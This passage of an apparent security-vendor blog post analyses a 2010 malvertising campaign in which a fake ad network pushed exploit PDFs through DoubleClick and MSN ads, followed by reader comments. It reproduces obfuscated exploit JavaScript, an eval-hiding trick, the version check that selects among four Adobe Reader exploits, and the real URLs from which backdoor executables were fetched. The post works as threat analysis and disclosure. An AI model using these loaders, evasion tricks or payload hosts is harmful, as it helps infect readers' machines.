YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYYlYYYvYYY YYY>YYY=YYY YYY9YYY.YYY1YYY)YYY YYY|YYY|YYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY9YYY.YYY2YYY)YYY YYY|YYY|YYY YYY(YYYlYYYvYYY YYY>YYY=YYY YYY8YYY.YYY1YYY3YYY)YYY YYY|YYY|YYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY8YYY.YYY1YYY7YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\n';th("var oesfeufxntyi = cwyuvaooeo.re"+"pla"+"ce(/[Y]/g,'');");/* avqjavi766743 = 60; <owzeuouz106118> */var ugyolugwu968354 = "_e75af8ac39f";/* vuyiua152184 = 76; <zriefda431629> */var iuoeonh343430 = "_21d716ac020";var evaiwueei264011 = "_7ed30974517";/* rlaoaya455073 = 95; <geaaoo654855> */var iuzxgj474859 = "_3046be797c0";var pewzyahmfb544339 = "_8bdfb70b60f";/* seiiaue71607 = 39; <unzoe856710> *//* yuydi485926 = 1; <dkykz871039> */var pgsinuunf = 100;/* hucrbdit453671 = 76; <nyyrrazqy740615> *//* namdkey949757 = 64; <yzdee833418> */var vuveioae876679 = "_0328e8fa935";/* iuoytl56881 = 46; <oiowiea705586> *//* ntpadaq590040 = 38; <ovkcjaka633301> */var gpyousxo = '';/* auomgyoed16943 = 82; <mumaa309375> */var xaeuhifje753328 = "_16533722a29";/* kmuiuayg202152 = 98; <asuuhlhy426995> *//* upcowvqa721683 = 3; <aydaeauo365685> */sauavlepu0 = oesfeufxntyi;var ayuyg642660 = "_15f35fef3a2";/* uedaeig772200 = 27; <oucyueo443122> *//* uyqota442513 = 52; <iyxuoa210597> *//* eyaye796590 = 43; <iaooywuv348521> */for(alookaaraaio=0;alookaaraaio<pgsinuunf;alookaaraaio++) {var vauiauyyfcfi = 'function a1106889858(fa) {return fa;} var a266415535 = 281772104;function a454936894(fa) {return fa;} var a289990746 = 1206395987;function a606709841(fa) {return fa;} var a814629542 = 809599932;function a975519308(fa) {return fa;} var a73837795 = 418139819;function a1311395772(fa) {return fa;} var a102714415 = 1168743178;function a457025328(fa) {return fa;} var a106369175 = 824445897;';var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var dsfsg = alookaaraaio+1;gpyousxo = 'var sauavlepu'+dsfsg+'=sauavlepu'+alookaaraaio+';'+vauiauyyfcfi+''+vauiauyyfcfi+''+vauiauyyfcfi+'';th(gpyousxo);}th(sauavlepu100);var okyyyornb516688 = "_3ffdcb9f05e";var pquxtoa762840 = "_68a883464be";/* yryeie384069 = 97; <aeyoboeaa202244> */
//</ACRO_script>
//</Document-Actions>

The obfuscation was sophisticated, showing the involvement of heavy manual effort. The javascript code is encoded with ASCII85Decode.

First, the deobfuscation function:

function ghfsdj(adbhsdh)
{
var jfsd = "gas%ss2u";
return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}
The shellcode snippets below are obfuscated with the function:

shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&C...");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC..");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589..");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CA..");

The deobfuscation function replaces && prefixes with %u. And then, an interesting trick is used to hide the use of the eval() function from pattern-based detection:

var ev = 'yeegsgvsssaglh';
..
this[ev.charAt (2) + ev.charAt (6) + ev.charAt (10) + ev.charAt (12)] ('var th = thi' + 's[\'ev\'+\'\'+\'al\'];');

The decoded javascript contains several pieces of exploit code for the different vulnerabilities below:

a) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ()

b) Adobe Acrobat and Reader util.printf (CVE-2008-2992)

c) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)

d) Adobe Reader GetMailInfo (CVE-2007-5659)

The javascript below checks for a matching version of exploitable Adobe Reader and if found, triggers the corresponding exploit:
aPlugins = app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for (var i=0; i < aPlugins.length; i++)
{
if (aPlugins[i].name=="EScript")

{
var lv=aPlugins[i].version;
}
}
if ((lv==9)||((sv==8)&&(lv<=8.12)))
{

geticon();
}
else if (lv==7.1)
{
printf();
}
else if (((sv==6)||(sv==7))&&(lv<7.11))
{
collab();
}
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
{
nplayer();
}

Initial detection rate of this PDF was extremely low--2 out of 42 on VirusTotal. Got a little better now but not much.

Upon successful exploitation, shellcode is executed and the browser downloads and runs the following two executables:
1. file.exe (HDD Plus), from: http://colemuns.com/pupseg/forum.php?f=MDAC&key=92e93d0553cdb3c89d7d397457811f6d&u=root, Virus Total results here.
2. 461-direct.exe (backdoor), from: http://searchjewel.org/any5/461-direct.exe, Virus Total results here.

Note that the binaries, and the ways that they were obfuscated, kept on changing for the past few days.

Another installed malware is the Kazy downloader; see the VirusTotal report here.

Actually, the exploits themselves kept on changing, too. When we first detected this on Dec 3rd, it was serving only one exploit--CVE-2010-0806, and it wasn't from colemuns.com, but from thjlnqbtgdw.com and pbcplifpgdw.com. During this time, the NeoSploit exploit pack was used instead of the later Eleonore-like pack.

Part 2--rad.msn.com case study

Malvertising by ADShufffle on rad.msn.com started later than DoubleClick; however, the behavior is quite the same.

Upon visiting a website that is serving banners from rad.msn.com, for example mail.live.com, msnbc.com, or realestate.msn.com, the browser is presented with an ad tag for a 728x90 banner ad from rad.msn.com:
<script type="text/javascript" src="http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=REAB01&AP=1390" onreadystatechange="startTimer();"></script>

Here rad.msn.com throws out some obfuscated javascript, which decodes to:
<script type="text/javascript" src="http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=23444436&lpd=${REQUESTID}&ASTPCT=${CLICKURL}"><script>

Which causes the browser to load from adshufffle. The actual 728x90 banner ad, which is again, illegally copied, is http://media.topsann.com/bdb/aBigCommerce/728x90stat.gif:

And the rest is similar.

At Armorize we've been developing technologies to detect drive-by downloads starting in the 2000, with our first major publication released in 2003 at the WWW Conference. In 2007, we acquired X-Solve to pushed out our drive-by download detection service, HackAlert. Recently, we released a new version of HackAlert--HackAlert SafeImpression, which is geared towards malvertising detection and ease of use by the online media industry.
If you are interested in any information, please email us at wayne@armorize.com
Part 2 of the story: About HDD Plus spreading also through OpenX vulnerabilities, and a guy behind all this

13 comments:

EFN said...

Really a very nice explanation on how a drive-by-download is done. I must admit that even though it is used for exploits, there has been put some real effort into it and actually shows real craftsmanship. If only it would be used for something more constructive.

But you really wrote an excellent post on this!

Anonymous said...

It seems odd that two major ad networks would fall victim to the same attack vector simultaneously, without their site being compromised. As interesting as this writeup may be, it falls short in describing how "adshuFFFle" got injected into their ad code to begin with and whether or not these breaches of Double Click and MSN have been resolved. There is a big difference in correcting the domain name referenced in code and identifying and resolving the intrusion, if such an intrusion occurred.

Anonymous said...

@Anonymous

You didn't understand how this worked. The hackers registered adshufffle.com particularly for this purpose. This is not a domain that was compromised.

Using this domain, they *posed* as AdShuffle, a legit company, who's domain is actual addshuffle.com (correct spelling).

The people from DoubleClick and MSN who review advertising applications fell for it and didn't notice the difference in spelling.

They allowed adshufffle.com to push ads through its network and from there it was easy for the attackers to serve whatever they wanted.

This was basically a social engineering attack to begin with.

SpamLoco said...

Hi,

AVG false positive in Armorize Blog?

- http://img818.imageshack.us/img818/7941/armo2.jpg

- http://img529.imageshack.us/img529/5127/armo1.jpg

Anonymous said...

@Anonymous December 11, 2010 5:01 AM

No, the previous anonymous poster has a legit question. I believe he understands that AdShufffle (wrong spelling) was posing as a legit company.

But it's not clearly explained (really, not explained at all) *how* this spelling exploit got into the ad networks. After all, there's no javascript code on the client side (eg, scout.com ) that references the misspelled ad network.

Your post though makes it clear that there is a human review process at doubleclick/msn where checkbox was clicked that should not have been clicked. This was the piece of information that's missing from Armorize's post.

Anonymous said...

Wayne,

Excellent analysis. Could you follow-up with commentary on the social engineering aspect of the attack? I and other commenters here are very curious.

Anonymous said...

Is there a typo in the [Associated IP] section? The IPs listed are the same except for the leading 1.

95.5.161.10 (serving PDF exploit)
195.5.161.10 (serving Java jar exploit)

Hoyt LLC said...

http://www.cloudscan.me/2010/12/ad-cdn-malware-microsoft-google-full.html

Ad CDN | Malware | Microsoft | Google | Full Disclosure

Hoyt LLC Research observes an Article now Published in PCWORLD and available in the Public Domain.

Hoyt LLC Research is under a Pending Coordinated Disclosure Agreement with Microsoft and Google with respect to these issues.

However, the issues are now Published and these issues are now moved to Full Disclosure.

Anonymous said...

So, I was slated to perform roughly $1,500 of legal research work for two clients on the evening of December 8th, while out of state for a court hearing the next morning. I suffered the attack on my laptop at the hotel and had to phone the two clients to tell them I could not do the time sensitive work for them. It not only damaged the expected income stream but the business relationship. Does any of the analysis performed by the experts result in identification of the culprits, making any sort of recovery possible? I suspect the answer is no, even though there likely is a money flow that could be followed. Answer to stephen@calri.com if you prefer.

Returnil said...

Hi Wayne,
Nice work on the analysis and detailed information. I am certain it will be useful for a great number of users and researchers. One request however would be to add Jotti (http://virusscan.jotti.org/) to your detection check rather than just VT.

@Anonymous said.. (Lawyer): There are two things you should look at adding to your line up: Boot-to-restore and/or image restore. In the first, you could have simply restarted your computer and whatever the malvertisement did would simply be gone, and in the second, you could have quickly restored to a clean image and been able to follow through with your assignment.

Detection is never going to reach 100%, but there are ways to ensure your system remains clean and productive in spite of this fact.

Henry Hertz Hobbit said...

VirusTotal seems to be permanently swamped so Jotti is all I use now. If you use ABP with eeither EasyList or FanBoy you would have been spared. If you had been using my PAC filter plus hosts file with the ad.doubleclick.net and rad.msn.com blocks activated you would also have been spared. The name of the real adshuffles are this.content.served.by.adshuffle.com, images.adshuffle.com, and media2.adshuffle.com. I find it interesting that they are also using the false goog1e-analytics.com (that is a one after the g, not an el) because it was at the same IP address one of these hosts were at. If anybody knows of a good place to have these scripts converted on the Internet I am all ears because I have been doing all of them manually. Just post here if you know it so we can all have it. Everything I have found and tried so far has failed.

Anonymous said...

These ads are served up via Javascript. Really, if you're not browsing the internet using Firefox with NoScript installed, you're running around with your pants down.

melesofa said...

What a great resource!

generic nolvadex

Post a Comment